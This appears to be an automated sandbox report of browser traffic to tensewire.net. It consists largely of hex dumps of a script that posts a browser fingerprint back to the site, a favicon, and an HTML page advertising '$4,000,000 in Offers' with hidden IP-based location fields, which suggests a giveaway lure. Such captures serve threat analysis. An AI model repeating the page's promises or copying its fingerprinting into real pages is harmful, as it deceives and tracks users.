                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.449747104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC622OUTGET /inc/msg.v3.js?662a9f54742ee HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://tensewire.net/3a36ef2959e87b2ca27c8f04b726a343
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC830INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: application/javascript
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 02 May 2024 18:22:13 GMT
                              last-modified: Tue, 05 Dec 2023 15:48:56 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: MISS
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SqrdTSdeRnDQqZL82bE4DAhNUu83ZrEFm5an5be8moGXRh%2FrPP9jojviVBgEl0EEI1hP8ciPk9STTl8OPuK9Zr39W5awy1t%2F1m6og52kOLX%2BByLncqiR%2BpspSEnZnQg2"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b73cafe12dd-ATL
                              2024-04-25 18:22:13 UTC539INData Raw: 36 35 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 70 75 73 68 43 6f 75 6e 74 28 70 73 68 70 61 72 61 6d 73 2c 70 73 68 70 75 62 2c 70 73 68 66 69 6e 67 65 72 70 72 69 6e 74 29 7b 0a 09 0a 09 76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 0a 09 78 68 72 2e 6f 70 65 6e 28 27 50 4f 53 54 27 2c 20 27 27 29 3b 0a 09 78 68 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2c 20 27 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 27 29 3b 0a 09 78 68 72 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 69 66 20 28 78 68 72 2e 73 74 61 74 75 73 20 3d 3d 3d 20 32 30 30 29 20 7b 0a 09 09 09 76 61 72 20 72
                              Data Ascii: 656function pushCount(pshparams,pshpub,pshfingerprint){var xhr = new XMLHttpRequest();xhr.open('POST', '');xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.onload = function() {if (xhr.status === 200) {var r
                              2024-04-25 18:22:13 UTC1090INData Raw: 70 75 62 20 2b 20 27 26 66 70 3d 27 20 2b 20 70 73 68 66 69 6e 67 65 72 70 72 69 6e 74 3b 0a 09 78 68 72 2e 73 65 6e 64 28 64 61 74 61 29 3b 0a 7d 0a 0a 0a 0a 76 61 72 20 4d 59 43 41 4c 4c 20 3d 20 4d 59 43 41 4c 4c 20 7c 7c 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 70 73 68 70 61 72 61 6d 73 20 3d 20 7b 7d 3b 20 2f 2f 20 70 72 69 76 61 74 65 0a 20 20 20 20 72 65 74 75 72 6e 20 7b 0a 20 20 20 20 20 20 20 20 69 6e 69 74 20 3a 20 66 75 6e 63 74 69 6f 6e 28 41 72 67 73 29 20 7b 0a 20 20 20 20 09 20 20 20 20 2f 2f 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 41 72 67 73 5b 32 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 68 70 61 72 61 6d 73 20 3d 20 41 72 67 73 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 73 68 70 75 62 20 3d
                              Data Ascii: pub + '&fp=' + pshfingerprint;xhr.send(data);}var MYCALL = MYCALL || (function(){ var pshparams = {}; // private return { init : function(Args) { //console.log(Args[2]); pshparams = Args[0]; pshpub =
                              2024-04-25 18:22:13 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.449750104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC400OUTGET /favicon.ico HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC830INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: image/x-icon
                              Transfer-Encoding: chunked
                              Connection: close
                              Cache-Control: public, max-age=604800
                              expires: Thu, 25 Apr 2024 21:30:19 GMT
                              last-modified: Thu, 29 Sep 2022 23:17:43 GMT
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              CF-Cache-Status: HIT
                              Age: 593514
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1AtniUt72RzwJAIuZjYudRxy5WgitAlVLJNN1utCuvTrPqDufvzM%2Bvi9i8b%2BsZttR%2F1Yw0a0MoCFJVQmgzATevo4erVUXmbKhjmC8BTjzTTip5Bq79qekmvxaakcgSv"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b73cc654587-ATL
                              alt-svc: h3=":443"; ma=86400
                              2024-04-25 18:22:13 UTC539INData Raw: 33 63 32 65 0d 0a 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 0c 00 bc 00 13 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 20 00 be 00 d0 00 be 00
                              Data Ascii: 3c2e h6 (00 h&(
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 be 00 95 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f8 00 be 00 66 00 be 00 2b 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bd 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 39 00 be 00 e9 00 be 00 ff 00 bd 00 f8 00 bf 00 67 00 ff 00 01 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f5 00 bd 00 59 00 00 00 01 00 00 00 00 00 00 00 00 00 bb 00 3c 00 be 00 cb 00 bd 00 65 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bf 00 58 00 00 00 01 00 00 00 00 00 00 00 00 00 80 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 2a 00 bf 00 db 00 be 00 ff 00 be 00 ff 00 be
                              Data Ascii: f+Y9g)Y<e)X*
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 be 00 ea 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d5 00 be 00 47 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bd 00 6d 00 be 00 eb 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 d6 00 bd 00 46 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bf 00 6f 00 bf 00 ea 00 bf 00
                              Data Ascii: GmFo
                              2024-04-25 18:22:13 UTC1369INData Raw: bc 00 17 00 bd 00 aa 00 be 00 fc 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 e3 00 be 00 5a 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bc 00 86 00 be 00 f4 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d7 00 be 00 47 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 22 00 bd 00 af 00 be 00 fb 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 e3 00 bf 00 5c 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bd 00 87 00 be 00 f3 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 d5 00 bd 00 46 00 aa 00 03 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: ZG"\F
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 00 00 00 00 00 00 c3 00 11 00 be 00 79 00 bd 00 c2 00 bd 00 92 00 bd 00 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 03 00 b6 00 07 00 bf 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: y
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 d4 00 06 00 bf 00 38 00 bd 00 a3 00 be 00 ef 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 bf 00 af 00 bb 00 40 00 b9 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 00 07 00 bf 00 3c 00 bf 00 a3 00 be 00 ec 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 f3 00 be 00
                              Data Ascii: 8@<
                              2024-04-25 18:22:13 UTC1369INData Raw: be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f1 00 be 00 b0 00 bc 00 45 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 06 00 be 00 3b 00 be 00 a9 00 bf 00 ef 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2
                              Data Ascii: E;
                              2024-04-25 18:22:13 UTC1369INData Raw: 00 4c 00 be 00 bc 00 bf 00 f6 00 be 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 be 00 b0 00 bb 00 40 00 db 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 0e 00 bf 00 6b 00 be 00 de 00 bd 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 f6 00 be 00 c4 00 bd 00 55 00 c4 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 0c 00 be 00 4f 00 be 00 c1 00 bf 00 f6 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00
                              Data Ascii: L@kUO
                              2024-04-25 18:22:13 UTC1369INData Raw: 0c 00 bb 00 53 00 be 00 c1 00 be 00 f7 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f3 00 be 00 b0 00 be 00 3f 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b4 00 11 00 c0 00 51 00 be 00 bc 00 be 00 f4 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be
                              Data Ascii: S?Q


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.449751104.21.47.804435468C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-04-25 18:22:12 UTC427OUTGET /3a36ef2959e87b2ca27c8f04b726a343?_ax=w HTTP/1.1
                              Host: tensewire.net
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: PHPSESSID=ee22049cb2431a7edf3dbdfcc8e5d0ef
                              2024-04-25 18:22:13 UTC816INHTTP/1.1 200 OK
                              Date: Thu, 25 Apr 2024 18:22:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              pragma: no-cache
                              vary: Accept-Encoding,User-Agent,User-Agent
                              x-frame-options: SAMEORIGIN
                              x-xss-protection: 1; mode=block
                              x-content-type-options: nosniff
                              alt-svc: h3=":443"; ma=86400
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vo8u44YI4G6SwbQpFHwA4ppi7P1BwybjMPtDocXLjsfJ1XyEiSQ64TjBRvoD7VD55JvXUIIm9%2B4CO0sV7b3PAQemd3Zs560r2LIxZBUgfSos5Ptvq8txgS%2BFE6wROPMe"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 87a05b742de54552-ATL
                              2024-04-25 18:22:13 UTC553INData Raw: 32 32 66 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c
                              Data Ascii: 22f8<html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <
                              2024-04-25 18:22:13 UTC1369INData Raw: 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6e 73 65 77 69 72 65 2e 6e 65 74 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 35 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2e 35 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 2f 2d 2d 3e 0a 09 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70
                              Data Ascii: k rel="stylesheet" href="https://tensewire.net/assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css"></noscript> ...link rel="stylesheet" type="text/css" href="assets/vendors/bootstrap-4.5.3/css/bootstrap.min.css"/--> <link rel="preload" href="http
                              2024-04-25 18:22:13 UTC1369INData Raw: 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 2d 74 6f 70 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 38 32 30 30 33 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 68 64 2d 74 6f 70 2d 74 78 20 7b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 66 72 6f 6e 74 2d 70 72 6f 67 72 65 73 73 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 38 32 30 30 33 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 20 20 20 20 2e 70 72 6f 67 72 65 73 73 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 36 65 36 65 36 20 21 69 6d
                              Data Ascii: tant;} .hd {background-color: #ffffff !important;} .hd-top {background-color: #820032 !important;} .hd-top-tx {color: #ffffff !important;} .front-progress {background-color: #820032 !important;} .progress {background-color: #e6e6e6 !im
                              2024-04-25 18:22:13 UTC1369INData Raw: 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 2b 69 2b 64 6c 3b 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42
                              Data Ascii: ){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertB
                              2024-04-25 18:22:13 UTC1369INData Raw: 3d 22 66 61 20 66 61 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 20 6d 72 2d 31 20 63 61 72 74 2d 62 67 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a 09 09 20 20 4f 76 65 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 6e 5f 6f 66 66 65 27 3e 24 34 2c 30 30 30 2c 30 30 30 3c 2f 73 70 61 6e 3e 20 69 6e 20 4f 66 66 65 72 73 20 67 69 76 65 6e 20 6f 75 74 20 73 6f 20 66 61 72 21 09 20 20 3c 2f 64 69 76 3e 0a 09 20 20 09 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 72 71 75 65 65 53 74 79 6c 65 20 6d 72 2d 32 22 3e 0a 09 09 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 20 6d 72 2d 31 20 63 61 72 74 2d 62 67 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 0a
                              Data Ascii: ="fa fa-shopping-cart mr-1 cart-bg" aria-hidden="true"></i> Over <span class='n_offe'>$4,000,000</span> in Offers given out so far! </div> <div class="marqueeStyle mr-2"> <i class="fa fa-shopping-cart mr-1 cart-bg" aria-hidden="true"></i>
                              2024-04-25 18:22:13 UTC1369INData Raw: 2e 70 6e 67 22 20 61 6c 74 3d 22 46 6c 61 67 22 3e 09 09 09 20 20 3c 2f 73 70 61 6e 3e 0a 09 09 20 20 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 5a 69 70 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 33 30 33 30 31 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 43 6f 75 6e 74 72 79 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 55 53 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 43 69 74 79 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 41 74 6c 61 6e 74 61 22 3e 0a 20 20 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 53 74 61 74 65 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 47 41 22
                              Data Ascii: .png" alt="Flag"> </span> </div></div></div> <input id="ipZip" type="hidden" value="30301"> <input id="ipCountry" type="hidden" value="US"> <input id="ipCity" type="hidden" value="Atlanta"> <input id="ipState" type="hidden" value="GA"
